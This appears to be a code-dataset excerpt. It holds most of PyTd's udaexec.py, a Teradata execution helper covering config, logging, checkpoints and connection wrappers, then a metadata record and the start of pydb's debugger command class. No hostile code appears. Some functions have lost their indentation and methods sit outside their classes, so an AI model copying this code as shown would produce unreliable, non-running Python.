    logMsgs = [(logging.INFO, "Initializing UdaExec...")]
    self.config = UdaExecConfig(configFiles, configEncoding,
                                configSection, parseCmdLineArgs, logMsgs)
    # Verify required configuration parameters are specified.
    self.config['appName'] = self.config.resolve(
        appName, errorMsg="appName is a required field, it must be "
        "passed in as a parameter or specified in a config file.")
    # Initialize runNumbers.
    self._initRunNumber(runNumberFile, runNumber, logMsgs)
    # Configure Logging
    self.configureLogging = util.booleanValue(
        self.config.resolve(configureLogging, default="True"))
    if self.configureLogging:
        self._initLogging(
            self.config.resolve(logDir, default="logs"),
            self.config.resolve(
                logFile, default=self.config.resolve(
                    "${appName}.${runNumber}.log")),
            util.booleanValue(
                self.config.resolve(logConsole, default="True")),
            getattr(
                logging, self.config.resolve(logLevel, default="INFO")),
            int(self.config.resolve(logRetention, default="90")), logMsgs)
    # Log messages that were collected prior to logging being configured.
    for (level, msg) in logMsgs:
        logger.log(level, toUnicode(msg))
    self._initVersion(self.config.resolve(
        version, default=""), self.config.resolve(gitPath, default=""))
    self._initQueryBands(self.config.resolve(production, default="false"))
    self._initCheckpoint(checkpointFile)
    self.odbcLibPath = self.config.resolve(odbcLibPath, default="")
    self.dataTypeConverter = dataTypeConverter
    logger.info(self)
    logger.debug(self.config)
    # Register exit function so interpreter shutdown is logged.
    atexit.register(exiting)
def connect(self, externalDSN=None, dataTypeConverter=None, **kwargs):
    """Creates a database connection.

    externalDSN optionally names a data source section in the loaded
    config; kwargs override or extend its parameters. The resolved
    "method" parameter selects the REST or ODBC driver. Returns a
    UdaExecConnection; raises api.InterfaceError on unknown data
    sources or unsupported methods.
    """
    # Construct data source configuration parameters
    args = {}
    if externalDSN is not None:
        externalDSN = self.config.resolve(externalDSN)
        args = self.config.section(externalDSN)
        if args is None:
            raise api.InterfaceError(
                api.CONFIG_ERROR,
                "No data source named \"{}\".".format(externalDSN))
    # Explicit keyword arguments take precedence over DSN settings.
    args.update(self.config.resolveDict(kwargs))
    # Log connection details (with the password masked).
    paramsToLog = dict(args)
    paramsToLog['password'] = 'XXXXXX'
    if externalDSN:
        paramsToLog['externalDSN'] = externalDSN
    logger.info("Creating connection: %s", paramsToLog)
    # Determine connection method.
    method = None
    if 'method' in args:
        method = args.pop('method')
    util.raiseIfNone('method', method)
    if 'queryBands' in args:
        queryBands = args.pop('queryBands')
        self.queryBands.update(queryBands)
    # Auto-commit is on unless explicitly configured otherwise.
    if 'autoCommit' not in args:
        args['autoCommit'] = "true"
    if not dataTypeConverter:
        dataTypeConverter = self.dataTypeConverter
    # Create the connection
    try:
        start = time.time()
        if method.lower() == METHOD_REST:
            conn = UdaExecConnection(
                self, tdrest.connect(queryBands=self.queryBands,
                                     dataTypeConverter=dataTypeConverter,
                                     **args))
        elif method.lower() == METHOD_ODBC:
            conn = UdaExecConnection(
                self, tdodbc.connect(queryBands=self.queryBands,
                                     odbcLibPath=self.odbcLibPath,
                                     dataTypeConverter=dataTypeConverter,
                                     **args))
        else:
            raise api.InterfaceError(
                api.CONFIG_ERROR,
                "Connection method \"{}\" not supported".format(method))
        duration = time.time() - start
        logger.info(
            "Connection successful. Duration: %.3f seconds. Details: %s",
            duration, paramsToLog)
        return conn
    except Exception:
        logger.exception("Unable to create connection: %s", paramsToLog)
        raise
def checkpoint(self, checkpointName=None):
    """Sets or clears the current checkpoint.

    With no name the checkpoint is cleared and skip mode is disabled;
    with a name it becomes the current checkpoint, ends skip mode when
    it matches the resume checkpoint, and is persisted via the
    checkpoint manager (if one is configured).
    """
    if checkpointName is None:
        logger.info("Clearing checkpoint....")
        self.currentCheckpoint = None
        self.skip = False
        if self.checkpointManager:
            self.checkpointManager.clearCheckpoint()
    else:
        self.currentCheckpoint = checkpointName
        if self.skip:
            if self.resumeFromCheckpoint == self.currentCheckpoint:
                logger.info(
                    "Reached resume checkpoint: \"%s\". "
                    "Resuming execution...", checkpointName)
                self.skip = False
        else:
            logger.info("Reached checkpoint: \"%s\"", checkpointName)
            # Only persist checkpoints hit during live (non-skip) execution.
            if self.checkpointManager:
                self.checkpointManager.saveCheckpoint(checkpointName)
def setCheckpointManager(self, checkpointManager):
    """Sets a custom Checkpoint Manager and loads its resume checkpoint."""
    util.raiseIfNone("checkpointManager", checkpointManager)
    logger.info("Setting custom checkpoint manager: %s", checkpointManager)
    self.checkpointManager = checkpointManager
    logger.info("Loading resume checkpoint from checkpoint manager...")
    self.setResumeCheckpoint(checkpointManager.loadCheckpoint())
def setResumeCheckpoint(self, resumeCheckpoint):
    """Sets the checkpoint that must be hit for executes to not
    be skipped.

    A truthy value turns skip mode on until that checkpoint is reached;
    a falsy value clears the resume checkpoint and resumes execution.
    """
    self.resumeFromCheckpoint = resumeCheckpoint
    if resumeCheckpoint:
        logger.info(
            "Resume checkpoint changed to \"%s\". Skipping all calls to "
            "execute until checkpoint is reached.",
            self.resumeFromCheckpoint)
        self.skip = True
    else:
        self.resumeFromCheckpoint = None
        if self.skip:
            self.skip = False
            logger.info(
                "Resume checkpoint cleared. Execute calls will "
                "no longer be skipped.")
        else:
            logger.info(
                "No resume checkpoint set, continuing execution...")
def _initLogging(self, logDir, logFile, logConsole, level, logRetention,
                 logMsgs):
    """Initialize UdaExec logging.

    Creates the log directory if needed, prunes old log files, and
    installs a file handler (plus a console handler when logConsole is
    set) on the root logger.  NOTE(review): this also replaces
    sys.excepthook process-wide.
    """
    if not os.path.exists(logDir):
        os.makedirs(logDir)
    self._cleanupLogs(logDir, logRetention, logMsgs)
    self.logDir = os.path.realpath(logDir)
    self.logFile = os.path.join(self.logDir, logFile)
    formatter = logging.Formatter(
        "%(asctime)s - %(name)s - %(levelname)s - %(message)s")
    fh = logging.FileHandler(self.logFile, mode="a", encoding="utf8")
    fh.setFormatter(formatter)
    fh.setLevel(level)
    sh = logging.StreamHandler(sys.stdout)
    sh.setFormatter(formatter)
    sh.setLevel(level)
    root = logging.getLogger()
    root.setLevel(level)
    root.addHandler(fh)
    if logConsole:
        root.addHandler(sh)
    # Route uncaught exceptions through the logging system.
    sys.excepthook = handleUncaughtException
def _cleanupLogs(self, logDir, logRetention, logMsgs):
"""Cleanup older log files."""
logMsgs.append(
(logging.INFO,
"Cleaning up log files older than {} days.".format(logRetention)))
cutoff = time.time() - (logRetention * 86400)
count = 0
for f in os.listdir(logDir):
f = os.path.join(logDir, f)
if os.stat(f).st_mtime < cutoff:
logMsgs.append(
(logging.DEBUG, "Removing log file: {}".format(f)))
os.remove(f)
count += 1
logMsgs.append((logging.INFO, "Removed {} log files.".format(count)))
def _initRunNumber(self, runNumberFile, runNumber, logMsgs):
    """Initialize the run number unique to this particular execution.

    When no explicit runNumber is given, an incrementing counter is
    kept in runNumberFile and the final run number is that counter
    prefixed with the current timestamp.  Messages are buffered in
    logMsgs because logging may not be configured yet.
    """
    if runNumber is not None:
        self.runNumber = runNumber
        logMsgs.append(
            (logging.INFO, "Setting run number to {}.".format(runNumber)))
    else:
        self.runNumber = "1"
        self.runNumberFile = self.config.resolve(
            runNumberFile, default='.runNumber')
        self.runNumberFile = os.path.abspath(self.runNumberFile)
        if os.path.isfile(self.runNumberFile):
            logMsgs.append(
                (logging.INFO, "Found run number "
                 "file: \"{}\"".format(self.runNumberFile)))
            with open(self.runNumberFile, "r") as f:
                self.runNumber = f.readline()
            if self.runNumber is not None:
                try:
                    self.runNumber = str(int(self.runNumber) + 1)
                except:
                    # Corrupt or non-numeric content; start over at 1.
                    logMsgs.append(
                        (logging.WARN, "Unable to increment run "
                         "number ({}) in {}. Resetting run number "
                         "to 1.".format(self.runNumber,
                                        self.runNumberFile)))
                    self.runNumber = "1"
            else:
                logMsgs.append(
                    (logging.WARN, "No run number found in {}. Resetting "
                     "run number to 1.".format(self.runNumberFile)))
        else:
            logMsgs.append(
                (logging.INFO, "No previous run number found as {} does "
                 "not exist. Initializing run number to 1".format(
                     self.runNumberFile)))
        # Persist the bare counter; the timestamp prefix below is not saved.
        with open(self.runNumberFile, 'w') as f:
            f.write(self.runNumber)
        self.runNumber = datetime.datetime.now().strftime(
            "%Y%m%d%H%M%S") + "-" + self.runNumber
    self.config['runNumber'] = self.runNumber
def _initCheckpoint(self, checkpointFile):
    """Initialize the result checkpoint.

    Sets up a file-based checkpoint manager (unless checkpointFile is
    falsy) and enters skip mode when a previously saved checkpoint is
    found.
    """
    self.currentCheckpoint = None
    self.skip = False
    if checkpointFile:
        checkpointFile = self.config.resolve(
            checkpointFile, default=self.config['appName'] +
            ".checkpoint")
    # Re-check: config resolution may have produced an empty value.
    if checkpointFile:
        checkpointFile = os.path.abspath(checkpointFile)
        self.checkpointManager = UdaExecCheckpointManagerFileImpl(
            checkpointFile)
        self.resumeFromCheckpoint = self.checkpointManager.loadCheckpoint()
        if self.resumeFromCheckpoint:
            logger.info(
                "Resuming from checkpoint \"%s\".",
                self.resumeFromCheckpoint)
            self.skip = True
        else:
            logger.info("No previous checkpoint found, executing "
                        "from beginning...")
            self.skip = False
    else:
        self.checkpointManager = None
        self.resumeFromCheckpoint = None
        logger.info("Checkpoint file disabled.")
def _initVersion(self, version, gitPath):
    """Initialize the version and GIT revision.

    Queries git for version, revision, and dirty state; failures are
    logged at DEBUG and ignored.  When no explicit version is supplied
    the git revision is used; having neither raises a config error.
    """
    if not gitPath:
        gitPath = "git"
        logger.debug("Git path not specified, using system path.")
    self.gitVersion = None
    self.gitRevision = None
    self.gitDirty = None
    try:
        self.gitVersion = subprocess.check_output(
            [gitPath, "--version"],
            stderr=subprocess.STDOUT).decode("utf-8").strip()
        self.gitRevision = subprocess.check_output(
            [gitPath, "describe", "--tags", "--always", "HEAD"],
            stderr=subprocess.STDOUT).decode("utf-8").strip()
        self.modifiedFiles = subprocess.check_output(
            [gitPath, "status", "--porcelain"],
            stderr=subprocess.STDOUT).decode("utf-8").splitlines()
        self.gitDirty = True if self.modifiedFiles else False
    except subprocess.CalledProcessError as e:
        # Git ran but returned an error (e.g. not inside a repository).
        logger.debug(
            "Git information is not available: %s.",
            e.output.decode("utf-8"))
    except Exception as e:
        # The git executable itself is missing or not runnable.
        logger.debug("Git is not available: %s", e)
    if not version:
        version = self.gitRevision
    if not version:
        raise api.InterfaceError(
            api.CONFIG_ERROR, "version is a required field, it must be "
            "passed in as a parameter, specified in a config file, "
            "or pulled from a git repository.")
    self.config['version'] = version
def _initQueryBands(self, production):
    """Initialize the Query Band that will be set on future connections."""
    # Ordered dict so the query bands render in a stable order.
    self.queryBands = collections.OrderedDict()
    self.queryBands['ApplicationName'] = self.config['appName']
    self.queryBands['Version'] = self.config['version']
    self.queryBands['JobID'] = self.runNumber
    self.queryBands['ClientUser'] = getpass.getuser()
    self.queryBands['Production'] = util.booleanValue(production)
    if self.configureLogging:
        self.queryBands['udaAppLogFile'] = self.logFile
    if self.gitRevision:
        self.queryBands['gitRevision'] = self.gitRevision
    if self.gitDirty is not None:
        self.queryBands['gitDirty'] = self.gitDirty
    self.queryBands['UtilityName'] = 'PyTd'
    self.queryBands['UtilityVersion'] = __version__
def __str__(self):
    """Render a human-readable banner of execution details for the log."""
    value = u"Execution Details:\n/"
    value += u'*' * 80
    value += u"\n"
    value += u" * Application Name: {}\n".format(
        toUnicode(self.config['appName']))
    value += u" * Version: {}\n".format(
        toUnicode(self.config['version']))
    value += u" * Run Number: {}\n".format(toUnicode(self.runNumber))
    value += u" * Host: {}\n".format(
        toUnicode(platform.node()))
    value += u" * Platform: {}\n".format(
        platform.platform(aliased=True))
    value += u" * OS User: {}\n".format(
        toUnicode(getpass.getuser()))
    value += u" * Python Version: {}\n".format(platform.python_version())
    value += u" * Python Compiler: {}\n".format(
        platform.python_compiler())
    value += u" * Python Build: {}\n".format(platform.python_build())
    value += u" * UdaExec Version: {}\n".format(__version__)
    value += u" * Program Name: {}\n".format(toUnicode(sys.argv[0]))
    value += u" * Working Dir: {}\n".format(toUnicode(os.getcwd()))
    # Git details only appear when _initVersion found a repository.
    if self.gitRevision:
        value += u" * Git Version: {}\n".format(self.gitVersion)
        value += u" * Git Revision: {}\n".format(self.gitRevision)
        value += u" * Git Dirty: {} {}\n".format(
            self.gitDirty, "" if not self.gitDirty else "[" +
            ",".join(self.modifiedFiles) + "]")
    if self.configureLogging:
        value += u" * Log Dir: {}\n".format(
            toUnicode(self.logDir))
        value += u" * Log File: {}\n".format(
            toUnicode(self.logFile))
    value += u" * Config Files: {}\n".format(
        toUnicode(self.config.configFiles))
    value += u" * Query Bands: {}\n".format(
        u";".join(u"{}={}".format(toUnicode(k), toUnicode(v))
                  for k, v in self.queryBands.items()))
    value += '*' * 80
    value += '/'
    return value
def _appendConfigFiles(configFiles, *args):
    """Accumulate config file names into configFiles.

    Each argument may be None (ignored), a single file name string
    (appended), or an iterable of file names (extended).
    """
    for entry in args:
        if entry is None:
            continue
        add = configFiles.append if util.isString(entry) else configFiles.extend
        add(entry)
class UdaExecCheckpointManager:

    """Manages the initialization and saving of checkpoints.

    Abstract base class; sub-classes (e.g. the file-based
    implementation) must override all three methods.
    """

    def loadCheckpoint(self):
        """Return the checkpoint name that we should resume from."""
        raise NotImplementedError(
            "loadCheckpoint must be implemented by sub-class")

    def saveCheckpoint(self, checkpointName):
        """Save the specified checkpoint."""
        # Fixed: the message previously named a non-existent
        # "raiseCheckpoint" method.
        raise NotImplementedError(
            "saveCheckpoint must be implemented by sub-class")

    def clearCheckpoint(self):
        """Remove the checkpoint so that the application starts from
        beginning next time around."""
        raise NotImplementedError(
            "clearCheckpoint must be implemented by sub-class")
class UdaExecCheckpointManagerFileImpl (UdaExecCheckpointManager):

    """Implementation of the UdaExecCheckpointMananer using a local file.

    The checkpoint name is stored as the first line of the file;
    clearing the checkpoint deletes the file.
    """

    def __init__(self, file):
        # Path of the checkpoint file.
        self.file = file

    def loadCheckpoint(self):
        """Return the saved checkpoint name, or None when no file exists."""
        resumeFromCheckpoint = None
        if os.path.isfile(self.file):
            logger.info(u"Found checkpoint file: \"%s\"", toUnicode(self.file))
            with open(self.file, "r") as f:
                resumeFromCheckpoint = f.readline()
            if not resumeFromCheckpoint:
                logger.warn(
                    u"No checkpoint found in %s.", toUnicode(self.file))
        else:
            logger.info(u"Checkpoint file not found: %s", toUnicode(self.file))
        return resumeFromCheckpoint

    def saveCheckpoint(self, checkpointName):
        """Write checkpointName to the checkpoint file (overwriting)."""
        logger.info(
            "Saving checkpoint \"%s\" to %s.", checkpointName, self.file)
        with open(self.file, 'w') as f:
            f.write(checkpointName)

    def clearCheckpoint(self):
        """Delete the checkpoint file if present."""
        logger.info("Removing checkpoint file %s.", self.file)
        if os.path.isfile(self.file):
            os.remove(self.file)
class UdaExecTemplate (string.Template):

    """Template used by UdaExec configuration and token replacement."""

    # Extends the default identifier pattern to allow dots in
    # placeholder names (e.g. ${section.option}).
    idpattern = r'[a-z][_a-z0-9\.]*'
class UdaExecConfig:

    """UdaExec configuration loader and resolver.

    Loads INI-style config files into per-section dicts and resolves
    ${...} placeholder references (recursively) against them.
    """

    def __init__(self, configFiles, encoding, configSection, parseCmdLineArgs,
                 logMsgs):
        """Load configFiles (and optionally --key=value command line
        arguments) into self.sections keyed by section name."""
        configParser = configparser.ConfigParser()
        # Preserve option-name case instead of lower-casing keys.
        configParser.optionxform = str
        configFiles = [os.path.expanduser(f) for f in configFiles]
        self.configFiles = [toUnicode(os.path.abspath(
            f)) + (": Found" if os.path.isfile(f) else ": Not Found")
            for f in configFiles]
        logMsgs.append(
            (logging.INFO,
             "Reading config files: {}".format(self.configFiles)))
        if sys.version_info[0] == 2:
            # Python 2 configparser cannot take an encoding directly.
            for f in configFiles:
                if os.path.isfile(f):
                    configParser.readfp(codecs.open(f, "r", encoding))
        else:
            configParser.read(configFiles, encoding)
        self.configSection = configSection
        self.sections = {configSection: {}}
        for section in configParser.sections():
            self.sections[section] = dict(configParser.items(section))
        if parseCmdLineArgs:
            # --key=value arguments override file values in the
            # primary config section.
            for arg in sys.argv:
                if arg.startswith('--') and '=' in arg:
                    (key, val) = arg.split("=", 1)
                    key = key[2:]
                    logMsgs.append(
                        (logging.DEBUG, u"Configuration value was set via "
                         "command line: {}={}".format(toUnicode(key),
                                                      toUnicode(val))))
                    self.sections[configSection][key] = val

    def __iter__(self):
        return iter(self.sections[self.configSection])

    def contains(self, option):
        """Return True if option exists in the primary config section."""
        return option in self.sections[self.configSection]

    def resolveDict(self, d, sections=None):
        """Resolve ${...} references in all string values of d, in place."""
        if sections is None:
            sections = [self.configSection]
        for key, value in d.items():
            if util.isString(value):
                d[key] = self._resolve(value, sections, None, None)
        return d

    def resolve(self, value, sections=None, default=None, errorMsg=None):
        """Resolve ${...} references in value; non-strings pass through."""
        if value is None:
            if errorMsg is not None:
                raise api.InterfaceError(api.CONFIG_ERROR, errorMsg)
            else:
                util.raiseIfNone("value", value)
        if not util.isString(value):
            return value
        if sections is None:
            sections = [self.configSection]
        return self._resolve(value, sections, default, errorMsg)

    def _resolve(self, value, sections, default, errorMsg):
        """Recursively substitute ${...} placeholders from sections.

        Substitution recurses until the value stops changing so nested
        references resolve; "$$" escapes a literal "$".
        """
        error = None
        for section in sections:
            try:
                s = self.sections[section]
                newValue = UdaExecTemplate(
                    value.replace("$$", "$$$$")).substitute(**s)
                if value != newValue:
                    value = self._resolve(newValue, sections, None, errorMsg)
                else:
                    value = value.replace("$$", "$")
                error = None
                break
            except KeyError as e:
                # Placeholder missing in this section; try the next one.
                error = e
        if error is not None:
            if default is not None:
                return default
            if errorMsg is not None:
                raise api.InterfaceError(api.CONFIG_ERROR, errorMsg)
            else:
                raise api.InterfaceError(
                    api.CONFIG_ERROR, "Unable to resolve variable \"{}\". "
                    "Not found: {}".format(value, error))
        return value

    def section(self, section):
        """Return a resolved copy of the named section, or None."""
        try:
            return self.resolveDict(self.sections[section].copy(),
                                    (section, self.configSection))
        except KeyError:
            return None

    def __getitem__(self, key):
        return self.resolve(self.sections[self.configSection][key])

    def __setitem__(self, key, value):
        self.sections[self.configSection][key] = value

    def __str__(self):
        """Render a banner of configuration values (passwords masked)."""
        length = 0
        for key in self.sections[self.configSection]:
            keyLength = len(key)
            if keyLength > length:
                length = keyLength
        value = u"Configuration Details:\n/"
        value += u'*' * 80
        value += u"\n"
        for key in sorted(self.sections[self.configSection]):
            value += u" * {}: {}\n".format(toUnicode(key.rjust(length)),
                                           toUnicode(
                                               self.resolve("${" + key + "}"))
                                           if 'password' not in key.lower()
                                           else u'XXXX')
        value += '*' * 80
        value += '/'
        return value
class UdaExecConnection:

    """A UdaExec connection wrapper for ODBC or REST connections.

    Delegates to the underlying DB API connection while keeping an
    internal cursor so execute/executemany/callproc can be invoked
    directly on the connection.
    """

    def __init__(self, udaexec, conn):
        self.udaexec = udaexec
        self.conn = conn
        self.internalCursor = self.cursor()

    def close(self):
        # NOTE(review): reachable from both __exit__ and __del__, so it
        # can run twice on the same connection -- confirm the underlying
        # drivers tolerate a double close.
        self.internalCursor.close()
        self.conn.close()

    def commit(self):
        self.conn.commit()

    def rollback(self):
        self.conn.rollback()

    def cursor(self):
        """Return a new UdaExecCursor wrapping a driver cursor."""
        return UdaExecCursor(self.udaexec, self.conn.cursor())

    def __del__(self):
        self.close()

    def __enter__(self):
        return self

    def __exit__(self, exceptionType, exceptionValue, traceback):
        self.close()

    def callproc(self, procname, params, **kwargs):
        """Call a stored procedure through the internal cursor."""
        return self.internalCursor.callproc(procname, params, **kwargs)

    def execute(self, query=None, params=None, **kwargs):
        """Execute a query on the internal cursor; returns that cursor."""
        self.internalCursor.execute(query, params, **kwargs)
        return self.internalCursor

    def executemany(self, query, params, **kwargs):
        """Execute a query per parameter set; returns the cursor."""
        self.internalCursor.executemany(query, params, **kwargs)
        return self.internalCursor
class UdaExecCursor:

    """A UdaExec cursor wrapper for ODBC or REST cursors.

    Adds checkpoint-aware skipping, config variable resolution, and
    timing/logging around the wrapped DB API cursor.
    """

    def __init__(self, udaexec, cursor):
        self.udaexec = udaexec
        self.cursor = cursor
        self.skip = False
        self.description = None
        self.types = None
        self.rowcount = -1

    def callproc(self, procname, params, runAlways=False,
                 continueOnError=False, ignoreErrors=[], **kwargs):
        """Call a stored procedure, honoring checkpoint skip mode.

        runAlways -- execute even while skipping to a resume checkpoint.
        continueOnError -- log failures instead of re-raising.
        ignoreErrors -- database error codes logged at ERROR level only.
        """
        self.skip = self.udaexec.skip and not runAlways
        if not self.skip:
            start = time.time()
            try:
                procname = self.udaexec.config.resolve(procname)
                outparams = self.cursor.callproc(procname, params, **kwargs)
                duration = time.time() - start
                logger.info(
                    "Procedure Successful. Duration: %.3f seconds, "
                    "Procedure: %s, Params: %s", duration, procname, params)
                return outparams
            except Exception as e:
                duration = time.time() - start
                if isinstance(e, api.DatabaseError) and e.code in ignoreErrors:
                    logger.error(
                        "Procedure Failed! Duration: %.3f seconds, "
                        "Procedure: %s, Params: %s, Error Ignored: ",
                        duration, procname, params, e)
                else:
                    logger.exception(
                        "Procedure Failed! Duration: %.3f seconds, "
                        "Procedure: %s, Params: %s", duration,
                        procname, params)
                if not continueOnError:
                    raise
        else:
            logger.info(
                "Skipping procedure, haven't reached resume checkpoint yet. "
                "Procedure: %s", procname)

    def close(self):
        self.cursor.close()

    def execute(self, query=None, params=None, file=None, fileType=None,
                delimiter=";", **kwargs):
        """Execute a query string, an iterable of queries, and/or a
        SQL/BTEQ script file; returns self for chaining."""
        if file is None:
            util.raiseIfNone("query", query)
        if query is not None:
            if util.isString(query):
                self._execute(self.cursor.execute, query, params, **kwargs)
            else:
                for q in query:
                    self._execute(self.cursor.execute, q, params, **kwargs)
        if file is not None:
            self._executeFile(file, params, fileType, delimiter, **kwargs)
        return self

    def executemany(self, query, params, **kwargs):
        """Execute query once per parameter sequence in params."""
        self._execute(self.cursor.executemany, query, params, **kwargs)
        return self

    def _executeFile(self, file, params, fileType, delimiter, runAlways=False,
                     **kwargs):
        """Execute each statement in a SQL (default) or BTEQ script file."""
        self.skip = self.udaexec.skip and not runAlways
        if not self.skip:
            file = self.udaexec.config.resolve(file)
            if fileType is None:
                script = util.SqlScript(file, delimiter)
            elif fileType == "bteq":
                script = util.BteqScript(file)
            else:
                # Fixed: message previously read "is not unknown".
                raise api.InterfaceError(
                    "UNKNOWN_FILE_TYPE",
                    "The file type '{}' is not known".format(fileType))
            for query in script:
                self._execute(
                    self.cursor.execute, query, params, runAlways, **kwargs)
        else:
            logger.info(
                "Skipping file, haven't reached resume checkpoint yet. "
                "File: %s", file)

    def _execute(self, func, query, params, runAlways=False,
                 continueOnError=False, logParamFrequency=1,
                 logParamCharLimit=80, ignoreErrors=[],
                 **kwargs):
        """Run func(query, params) with resolution, timing and logging."""
        self.skip = self.udaexec.skip and not runAlways
        if not self.skip:
            start = time.time()
            paramStr = _getParamsString(params, logParamFrequency,
                                        logParamCharLimit)
            try:
                query = self.udaexec.config.resolve(query)
                func(query, params, **kwargs)
                self.description = self.cursor.description
                self.types = self.cursor.types
                self.rowcount = self.cursor.rowcount
                duration = time.time() - start
                rowsStr = " " if self.cursor.rowcount < 0 else \
                    " Rows: %s, " % self.cursor.rowcount
                logger.info(
                    "Query Successful. Duration: %.3f seconds,%sQuery: %s%s",
                    duration, rowsStr, query, paramStr)
            except Exception as e:
                # Reset result metadata so a failed execute is not
                # mistaken for the previous successful one.
                self.description = None
                self.types = None
                self.rowcount = -1
                duration = time.time() - start
                if isinstance(e, api.DatabaseError) and e.code in ignoreErrors:
                    logger.error(
                        "Query Failed! Duration: %.3f seconds, Query: %s%s, "
                        "Error Ignored: %s", duration, query, paramStr, e)
                else:
                    logger.exception(
                        "Query Failed! Duration: %.3f seconds, Query: %s%s",
                        duration, query, paramStr)
                if not continueOnError:
                    raise e
        else:
            logger.info(
                "Skipping query, haven't reached resume checkpoint yet. "
                "Query: %s", query)

    def fetchone(self):
        if self.skip:
            return None
        return self.cursor.fetchone()

    def fetchmany(self, size=None):
        if self.skip:
            return []
        return self.cursor.fetchmany(size)

    def fetchall(self):
        if self.skip:
            return []
        return self.cursor.fetchall()

    def nextset(self):
        if self.skip:
            return None
        return self.cursor.nextset()

    def setinputsizes(self, sizes):
        # Fixed: previously passed self as an extra positional argument.
        self.cursor.setinputsizes(sizes)

    def setoutputsize(self, size, column=None):
        # Fixed: previously called a non-existent "setoutputsizes" method,
        # passed self as an extra argument, and dropped column.
        self.cursor.setoutputsize(size, column)

    def __iter__(self):
        return self

    def __next__(self):
        if self.skip:
            raise StopIteration()
        return self.cursor.__next__()

    def next(self):
        # Python 2 iterator protocol compatibility.
        return self.__next__()

    def __enter__(self):
        return self

    def __exit__(self, t, value, traceback):
        self.close()
def _getParamsString(params, logParamFrequency=1, logParamCharLimit=80):
    """Format query parameters for logging.

    Returns "" when params is empty or logParamFrequency <= 0.  For a
    sequence of parameter rows, only the first row and every
    logParamFrequency-th row are rendered, plus the final row when it
    would otherwise be omitted.
    """
    if not params or logParamFrequency <= 0:
        return ""
    if not isinstance(params[0], (list, tuple)):
        # A single flat parameter sequence.
        return u", Params: {}".format(_getParamString(
            params, logParamCharLimit))
    rendered = []
    for position, row in enumerate(params, 1):
        if position == 1 or position % logParamFrequency == 0:
            rendered.append(_getParamString(row, logParamCharLimit,
                                            position))
    total = len(params)
    # Always include the last row so the log shows where the batch ended.
    if total != 1 and total % logParamFrequency != 0:
        rendered.append(_getParamString(params[-1], logParamCharLimit, total))
    return u", Params: {}".format(u"\n".join(rendered))
def _getParamString(params, logParamCharLimit=80, index=None):
paramsStr = []
for p in params:
p = repr(p)
if logParamCharLimit > 0 and len(p) > logParamCharLimit:
p = (p[:(logParamCharLimit)] + '...')
paramsStr.append(p)
prefix = u"["
if index is not None:
prefix = u"%s:[" % index
return prefix + u",".join(paramsStr) + u"]"
| {
"repo_name": "fxstein/PyTd",
"path": "teradata/udaexec.py",
"copies": "1",
"size": "35268",
"license": "mit",
"hash": -5338928629833625000,
"line_mean": 39.3986254296,
"line_max": 79,
"alpha_frac": 0.5587501418,
"autogenerated": false,
"ratio": 4.486452105330111,
"config_test": true,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5545202247130111,
"avg_score": null,
"num_lines": null
} |
"""A Python debugger command class.
Routines here have to do with parsing or processing commands, but are
not the commands themselves which are in gdb.py.in. Generally (but
not always) they are not specific to pydb. They are sort of more
oriented towards any gdb-like debugger. Also routines that need to be
changed from cmd are here.
$Id: pydbcmd.py,v 1.47 2008/04/16 01:20:47 rockyb Exp $"""
import cmd, linecache, sys, types
from fns import *
# Interaction prompt line will separate file and call info from code
# text using value of line_prefix string. A newline and arrow may
# be to your liking. You can set it once pydb is imported using the
# command "pydb.line_prefix = '\n% '".
# line_prefix = ': ' # Use this to get the old situation back
line_prefix = '\n-> ' # Probably a better default
class Cmd(cmd.Cmd):
def __init__(self, completekey='tab', stdin=None, stdout=None):
    """Initialize the command processor and its default settings."""
    cmd.Cmd.__init__(self, completekey, stdin, stdout)
    self._user_requested_quit = False
    self.aliases = {}            # alias name -> expansion text
    self.cmdtrace = False        # echo commands before running them
    self.flush = False  # flush after each write
    self.logging = False         # whether output logging is enabled
    self.logging_file = "pydb.txt"
    self.logging_fileobj = None  # file object from open()
    self.logging_overwrite = False
    self.logging_redirect = False
    self.nohelp = 'Undefined command or invalid expression \"%s\".\nType \"help\" for a list of debugger commands.'
    self.prompt = '(Pydb) '
    self.rcLines = []            # queued startup/rc command lines
def print_source_line(self, lineno, line):
    """Print out a source line of text, e.g. the second line in:
        (/tmp.py:2):  <module>
        2 import sys,os
        (Pydb)
    We define this method specifically so it can be customized for
    such applications like ipython."""
    # We don't use the filename normally. ipython and other applications
    # however might.
    self.msg_nocr('%d %s' % (lineno, line))
    return
def _runscript(self, filename):
    """Run the program in filename under debugger control."""
    # When bdb sets tracing, a number of call and line events happens
    # BEFORE debugger even reaches user's code (and the exact sequence of
    # events depends on python version). So we take special measures to
    # avoid stopping before we reach the main script (see user_line and
    # user_call for details).
    self._wait_for_mainpyfile = True
    self.mainpyfile = self.canonic(filename)
    # Start with fresh empty copy of globals and locals and tell the script
    # that it's being run as __main__ to avoid scripts being able to access
    # the pydb.py namespace.
    globals_ = {"__name__" : "__main__",
                "__file__" : self.mainpyfile,
                "__builtins__" : __builtins__
                }
    locals_ = globals_
    # Python 2 execfile runs the script text in that namespace.
    statement = 'execfile( "%s")' % filename
    self.running = True
    self.run(statement, globals=globals_, locals=locals_)
    return
def default(self, line):
    """Method called on an input line when the command prefix is
    not recognized. In particular we ignore # comments and execute
    Python commands which might optionally start with $"""
    if line[:1] == '#': return
    if line[:1] == '$': line = line[1:]
    if not self.autoeval:
        self.errmsg("""Undefined command: "%s". Try "help".""" % line)
        return
    # When stopped inside code, evaluate in that frame's namespaces.
    if self.curframe:
        local_vars = self.curframe.f_locals
        global_vars = self.curframe.f_globals
    else:
        local_vars = None
        # FIXME: should probably have place where the
        # user can store variables inside the debug session.
        # The setup for this should be elsewhere. Possibly
        # in interaction.
        global_vars = None
    try:
        # Python 2 exec-statement syntax.
        code = compile(line + '\n', '"%s"' % line, 'single')
        exec code in global_vars, local_vars
    except:
        t, v = sys.exc_info()[:2]
        if type(t) == types.StringType:
            exc_type_name = t
        else: exc_type_name = t.__name__
        self.errmsg('%s: %s' % (str(exc_type_name), str(v)))
### This comes from cmd.py with self.stdout.write replaced by self.msg.
### Also we extend to given help on an object name. The
### Docstring has been updated to reflect all of this.
### This comes from cmd.py with self.stdout.write replaced by self.msg.
### Also we extend to given help on an object name. The
### Docstring has been updated to reflect all of this.
def do_help(self, arg):
    """help [command [subcommand]|expression]

    Without argument, print the list of available debugger commands.

    When an argument is given, it is first checked to see if it is a
    command name. 'help exec' gives help on the ! command.

    When the argument is an expression or object name, you get the same
    help that you would get inside a Python shell running the built-in
    help() command.
